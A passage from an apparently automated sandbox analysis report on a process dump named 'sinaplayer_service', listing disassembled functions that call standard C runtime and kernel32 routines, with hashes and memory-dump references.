                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$__freebuf_close_errno_fileno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1586031509-0
                                                                                                                                                                                                    • Opcode ID: 420fb923944ec85eb9e92021de29aa89de89cb2ed8c06761b6a58aecfb4c2e10
                                                                                                                                                                                                    • Instruction ID: c072027c5a13eef3f7400a781a925967ea910805cabada3c2573f1c948cd388f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 420fb923944ec85eb9e92021de29aa89de89cb2ed8c06761b6a58aecfb4c2e10
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F0F4369197026EF7211A6A8C0476F3698AF5A37DF125715DA345B0C0D778D0025BA9
                                                                                                                                                                                                    Function 6D0F7D4E Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120 ref: 6D0F7D5D
                                                                                                                                                                                                      • Part of subcall function 6D0F81A1: ?_Cancel@_StructuredTaskCollection@details@Concurrency@@QAEXXZ.MSVCR120(?,?,00000000,?,?,?,6D0E9222), ref: 6D0F81F1
                                                                                                                                                                                                      • Part of subcall function 6D0F81A1: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6D0F8228
                                                                                                                                                                                                      • Part of subcall function 6D0F81A1: Concurrency::details::ContextBase::CancelCollectionComplete.LIBCMT ref: 6D0F8246
                                                                                                                                                                                                    • __uncaught_exception.MSVCR120 ref: 6D0F7D62
                                                                                                                                                                                                    • ?_CleanupToken@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120 ref: 6D0F7D87
                                                                                                                                                                                                    • ?_CleanupToken@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120 ref: 6D0F7D93
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0F7D9B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CE94), ref: 6D0F7DB0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$Collection@details@StructuredTask$CleanupSpinToken@_$??0exception@std@@Abort@_Base::CancelCancel@_CollectionCompleteConcurrency::details::ContextExceptionOnce@?$_ThrowWait@$00@details@__uncaught_exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4114090006-0
                                                                                                                                                                                                    • Opcode ID: d2798bfe3a12fbd269c25449916706f00d688c3990f8b9e5cdc883c019ce47e7
                                                                                                                                                                                                    • Instruction ID: 48a670f2981976e61224be5cf3f6004275df95ea03e43ba2705d896a1a360548
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2798bfe3a12fbd269c25449916706f00d688c3990f8b9e5cdc883c019ce47e7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF0D130D0870A8AEB249A55D4043BE73F8AF80618FA0869A8D6603550DB70A58AC683
                                                                                                                                                                                                    Function 6D08EE11 Relevance: 9.0, APIs: 6, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • _callnewh.MSVCR120(?), ref: 6D0DDA32
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001), ref: 6D0DDA50
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0AC7FC,?,00000001), ref: 6D0DDA65
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D0DDA6C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D0DDA73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocErrorExceptionHeapLastThrow_callnewh_errnomallocstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2319598913-0
                                                                                                                                                                                                    • Opcode ID: d9461e3d1ee33fb7c99bc1acd5f009f7ed33feaae0686688a9c6a754bb5a43ef
                                                                                                                                                                                                    • Instruction ID: 7ff5b7651eb224fc68434756e52f9376f5dc9b2fed00c4c0f80d09d4fbe78d10
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9461e3d1ee33fb7c99bc1acd5f009f7ed33feaae0686688a9c6a754bb5a43ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BF0903984821AABFF00ABE9EC44BEE7BBCAF01214F114455E904E7182EB718A549A95
                                                                                                                                                                                                    Function 6D0A69D9 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000180,6D0948CA), ref: 6D0A69E4
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000008,00000002,00000180,6D0948CA), ref: 6D0A69F5
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000001,00000002,00000180,6D0948CA), ref: 6D0D345B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0948CA,6D15D088,00000001,00000002,00000180), ref: 6D0D3470
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0D3476
                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000), ref: 6D0D347D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerThreadValue@$CurrentExceptionPriorityThrowstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4031781369-0
                                                                                                                                                                                                    • Opcode ID: e76322b9b01318d76c8a9f1f80df31335ae566e5b49a013fbf476bd683db35c3
                                                                                                                                                                                                    • Instruction ID: 4b0c24d215fac6ae86fc505d1a24c267645a8ef94a029771c78be4c614376eb0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e76322b9b01318d76c8a9f1f80df31335ae566e5b49a013fbf476bd683db35c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14F0C27490522AEBFF00DBF48849BBE77B8BB05600F400952E91897242DFB4E50587A1
                                                                                                                                                                                                    Function 6D0AF5F8 Relevance: 9.0, APIs: 6, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,?,6D0AF6A3,?,?,00000104,?), ref: 6D0AF5FD
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,?,6D0AF6A3,?,?,00000104,?), ref: 6D0AF604
                                                                                                                                                                                                    • _wfullpath.MSVCR120(?,?,?,00000000,?,?,6D0AF6A3,?,?,00000104,?), ref: 6D0AF615
                                                                                                                                                                                                      • Part of subcall function 6D094BF0: GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6D094C2A
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0AF61F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$FullNamePath_wfullpath
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3755888649-0
                                                                                                                                                                                                    • Opcode ID: f8794acf8b2ec6d722004b7f8c125df7752100d2d01fc37d538e6c54de1fa492
                                                                                                                                                                                                    • Instruction ID: 3734ac1daf5941bdd3c7658066362a8fec0242bb41de916981f39bc819551984
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8794acf8b2ec6d722004b7f8c125df7752100d2d01fc37d538e6c54de1fa492
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5F0B431614205BFEB021F64DC01B6D7B78AF46359F0240A0FA145F170D7718815EBA6
                                                                                                                                                                                                    Function 6D097CFE Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 181COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F720: GetLastError.KERNEL32(?,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F722
                                                                                                                                                                                                      • Part of subcall function 6D08F720: __crtFlsGetValue.MSVCR120(?,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F730
                                                                                                                                                                                                      • Part of subcall function 6D08F720: SetLastError.KERNEL32(00000000,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F741
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(0000001A,00000001), ref: 6D0A91E6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Value__crt_calloc_crt
                                                                                                                                                                                                    • String ID: $d
                                                                                                                                                                                                    • API String ID: 3815485746-2084297493
                                                                                                                                                                                                    • Opcode ID: 49b5e112b5e5b02c1efc78ca90f7858e39eb603c1877d54fcbafeb1b1d3393f2
                                                                                                                                                                                                    • Instruction ID: 7d17285c457df098c0e213fff9ea54ca08504640f075f0a5299bf2346cc5d1da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49b5e112b5e5b02c1efc78ca90f7858e39eb603c1877d54fcbafeb1b1d3393f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E51B0356053448FE721CB98D0943A5BBF1EF16358F68C59ED4948B643C376E90BCB62
                                                                                                                                                                                                    Function 6D0A8AFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,00000001,00000000), ref: 6D0A8B1D
                                                                                                                                                                                                    • ___crtGetStringTypeA.LIBCMT ref: 6D0A8B71
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,FE90005A,00000100,00000020,00000100,?,00000100,5EFC4D8B,00000000,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6D0A8B92
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,FE90005A,00000200,00000020,00000100,?,00000100,5EFC4D8B,00000000), ref: 6D0A8BBA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$__crt$InfoType___crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3423027535-3916222277
                                                                                                                                                                                                    • Opcode ID: e8336135bda89793628c190f300758ac122fdd34a30af04aff5584f9887d4208
                                                                                                                                                                                                    • Instruction ID: 27895337989eb63e1e77e8feff4f0839d5f9cc87e4a99f59e4a2026d35a873e4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8336135bda89793628c190f300758ac122fdd34a30af04aff5584f9887d4208
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44410BB050478C5FEB228E688C54BFBBBFDAB46308F1444EED58687147D2719A45CF61
                                                                                                                                                                                                    Function 6D0A55D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0D31D6
                                                                                                                                                                                                      • Part of subcall function 6D0A6686: InterlockedPopEntrySList.KERNEL32(?,?,?,00000000,?,?,6D0A5627,?,00000000), ref: 6D0A66A1
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0D3210
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8,?), ref: 6D0D3225
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$EntryExceptionInterlockedListThrow
                                                                                                                                                                                                    • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                    • API String ID: 1048554159-3650809737
                                                                                                                                                                                                    • Opcode ID: bdb9b5bdc749cedde8dfda9cdd3091b94a00900093b9a5752d29171232b5dc3d
                                                                                                                                                                                                    • Instruction ID: c55fe50aecf7165837166f1e635cdf1aa005aab3f0ec23e519ab635e307295d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdb9b5bdc749cedde8dfda9cdd3091b94a00900093b9a5752d29171232b5dc3d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A31B275A04209AFEB05CF98C880BFEB7B9FF49314F54412AE915AB251DF31AA11CF90
                                                                                                                                                                                                    Function 6D09BEE6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fltout2.LIBCMT ref: 6D09BF13
                                                                                                                                                                                                      • Part of subcall function 6D09B131: $I10_OUTPUT.MSVCR120(?,?,?,?,?,?,6D1092B2,?,?,?,?,00000016,?,0000015D,?), ref: 6D09B170
                                                                                                                                                                                                      • Part of subcall function 6D09B131: strcpy_s.MSVCR120(6D1092B2,?,?,?,?,?,?,?,?,6D1092B2,?,?,?,?,00000016), ref: 6D09B190
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000,00000002,?,6D12A55C,000003FF,00000002,00000000,00000000,00000000,?,?,6D1092B2,00000016), ref: 6D0E0FC3
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000000,00000002,?,6D12A55C,000003FF,00000002,00000000,00000000,00000000,?,?,6D1092B2,00000016), ref: 6D0E0FCA
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000,00000002,?,6D12A55C,000003FF,00000002,00000000,00000000,00000000,?,?,6D1092B2,00000016), ref: 6D0E0FD6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$I10___fltout2_invalid_parameter_noinfostrcpy_s
                                                                                                                                                                                                    • String ID: -
                                                                                                                                                                                                    • API String ID: 2633025121-2547889144
                                                                                                                                                                                                    • Opcode ID: c0da0131f328a873b231f4aee73e49c96bfa89868b555efb4cad5492780a5209
                                                                                                                                                                                                    • Instruction ID: 8e1d86ce3f9413942451d01908ccca992d4156a8ed4604cdda68418e4bd49ce0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0da0131f328a873b231f4aee73e49c96bfa89868b555efb4cad5492780a5209
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA212B73A0410A9FEB059E7ACC91FEFBBACEF08620F054129F515AB180FB70D4109BA1
                                                                                                                                                                                                    Function 6D0B2C60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcspbrk.LIBCMT(005B79DE,6D0B2CB8,?,6D161218,6D0B2DD4), ref: 6D0B2C85
                                                                                                                                                                                                    • _wmatch.LIBCMT ref: 6D0D3E9F
                                                                                                                                                                                                      • Part of subcall function 6D0B2C27: _malloc_crt.MSVCR120(00000008,?,6D0FC85C,00000000,00000000,00000000,00000001,00000000), ref: 6D0B2C2C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _malloc_crt_wcspbrk_wmatch
                                                                                                                                                                                                    • String ID: y[
                                                                                                                                                                                                    • API String ID: 2060052928-3866484319
                                                                                                                                                                                                    • Opcode ID: 95a6a8002ea9432a60b5a443998a0b1b54d1c19d5ab527d75d7da4b5894722af
                                                                                                                                                                                                    • Instruction ID: 16c07a4c9f4945740e559ab76423e85f0457d64fb7cb0861e9505c6d8b1b87e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95a6a8002ea9432a60b5a443998a0b1b54d1c19d5ab527d75d7da4b5894722af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D921D576A0D6138BFB214F38E900B76B3F9EF46760321452EE950DB259D772DC818B80
                                                                                                                                                                                                    Function 6D096EDE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __output_l.LIBCMT ref: 6D096F2A
                                                                                                                                                                                                      • Part of subcall function 6D096C0F: _errno.MSVCR120(?,?,?,00000000), ref: 6D096C84
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D59E6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D59F1
                                                                                                                                                                                                    • _flsbuf.MSVCR120(00000000,?), ref: 6D0D5A03
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__output_l_flsbuf_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 531506805-1255198513
